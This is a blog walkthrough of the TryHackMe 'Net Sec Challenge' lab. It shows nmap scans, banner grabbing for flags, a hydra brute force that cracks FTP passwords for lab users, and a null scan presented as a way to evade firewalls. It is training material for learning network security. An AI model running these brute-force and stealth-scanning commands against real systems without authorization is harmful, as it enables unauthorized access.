Net Sec Challenge: THM Walkthrough

July 25, 2025 · 6 min read

This is a walkthrough for the TryHackMe room Network Security Challenge Room. This challenge is designed to use nmap, telnet, ftp and hydra to find flags and learn about network security.

Information Gathering

Start the machine and save IP address for the room.

export IP=10.10.164.150

Let's use ping to check if the machine is reachable.

ping $IP
64 bytes from 10.10.164.150: icmp_seq=0 ttl=63 time=21.815 ms

1. What is the highest port number being open less than 10,000?

Let's use nmap to scan the target for the first 10.000 ports.

nmap -p1-10000 -T4 $IP
#     |         |-> -T4 for faster execution
#     |-> -p1-10000 to scan ports from 1 to 10.000
Nmap scan report for 10.10.164.150
Host is up (0.022s latency).
Not shown: 9995 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 49.03 seconds

Answer: 8080

2. There is an open port outside the common 1000 ports; it is above 10,000. What is it?

Let's use -p- to scan all ports (65535 ports) and see if there are any other open ports.

nmap -p- -T4 $IP
#     |   |-> -T4 for faster execution
#     |-> -p- to scan all ports
Nmap scan report for 10.10.164.150
Host is up (0.021s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
8080/tcp  open  http-proxy
10021/tcp open  unknown

Answer: 10021

3. How many TCP ports are open?

22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
8080/tcp  open  http-proxy
10021/tcp open  unknown

Answer: 6

4. What is the flag hidden in the HTTP server header?

Let's use nmap http-header scanning script to find the HTTP server header.

nmap -p 80 --script=http-headers $IP
#     |             |-> -http-headers script to scan HTTP headers
#     |-> -p 80 to scan port 80
PORT   STATE SERVICE VERSION
80/tcp open  http    lighttpd
|_http-server-header: lighttpd THM{web_server_25352}
| http-headers:
|   Content-Type: text/html
|   Accept-Ranges: bytes
|   ETag: "229449419"
|   Last-Modified: Tue, 14 Sep 2021 07:33:09 GMT
|   Content-Length: 226
|   Connection: close
|   Date: Mon, 28 Jul 2025 10:35:10 GMT
|   Server: lighttpd THM{web_server_25352}
|
|_  (Request type: HEAD)

Answer: THM{web_server_25352}

5. What is the flag hidden in the SSH server header?

Let's use nmap ssh-auth-methods script to find our flag.

nmap -p 22 --script=ssh-auth-methods $IP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| ssh-auth-methods:
|   Supported authentication methods:
|     publickey
|_    password
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-OpenSSH_8.2p1 THM{946219583339}
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.95%I=7%D=7/28%Time=6887538E%P=arm-apple-darwin24.2.0%r(N
SF:ULL,2A,"SSH-2\.0-OpenSSH_8\.2p1\x20THM{946219583339}\x20\r\n");

Also, the SSH service is unrecognized because of its modified banner because it contains our flag.

Answer: THM{946219583339}

6. We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

nmap -sV -p- -T4 $IP
#     |   |   |-> -T4 for faster execution
#     |   |-> -p- to scan all ports
#     |-> -sV for service version detection
...
10021/tcp open  ftp         vsftpd 3.0.5
...

Answer: vsftpd 3.0.5

7. We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

Let's use Hydra to brute force the FTP service on port 10021. We will use the usernames eddie and quinn that we learned about, and the password list rockyou.txt. I added the usernames to a file called user-list.

hydra -L user-list -P rockyou.txt -s 10021 ftp://$IP
#      |            |              |        |-> ftp://$IP to specify the FTP service
#      |            |              |-> -s 10021 to specify the port
#      |            |-> -P to specify a file with passwords
#      |-> -L to specify a file with usernames   
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688796 login tries (l:2/p:14344398), ~1793050 tries per task
[DATA] attacking ftp://10.10.164.150:10021/
[10021][ftp] host: 10.10.164.150   login: eddie   password: jordan
[10021][ftp] host: 10.10.164.150   login: quinn   password: andrea
1 of 1 target successfully completed, 2 valid passwords found

We successfully brute-forced the FTP service and found two valid credentials:

Username: eddie, Password: jordan
Username: quinn, Password: andrea

Now, let's connect to the FTP service using the eddie user and quinn users to see if we can find any flags.

Nothing discovered on the eddie user.

But we found a filename ftp_flag.txt in the quinn user and downloaded it to our machine.

ftp 10.10.164.150 10021
Connected to 10.10.164.150.
220 (vsFTPd 3.0.5)
Name (10.10.164.150:root): quinn
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1002     1002           18 Sep 20  2021 ftp_flag.txt
226 Directory send OK.
ftp> get ftp_flag.txt
local: ftp_flag.txt remote: ftp_flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp_flag.txt (18 bytes).
226 Transfer complete.
18 bytes received in 0.00 secs (39.4128 kB/s)

cat ftp_flag.txt 
THM{321452667098}

Answer: THM{321452667098}

8. Browsing to http://10.10.164.150:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

Null Scan doesn't set any TCP flags, so it is useful to bypass firewalls and packet filters that block certain types of traffic. Let's use nmap with the -sN option to perform a null scan on port 8080.

nmap -sN 10.10.164.150
Nmap scan report for 10.10.164.150
Host is up (0.027s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE         SERVICE
22/tcp   open|filtered ssh
80/tcp   open|filtered http
139/tcp  open|filtered netbios-ssn
445/tcp  open|filtered microsoft-ds
8080/tcp open|filtered http-proxy

Answer: THM{f7443f99}

Conclusion

This room was a great practice for network security skills, including using tools like nmap, telnet, ftp, and hydra to find flags and learn about network security. The advanced technique like null scan was a nice touch to bypass firewalls and packet filters, sometimes we need to avoid detection and remain "stealthy" if possible.

Information Gathering​

Conclusion​

Links​

Information Gathering

Conclusion

Links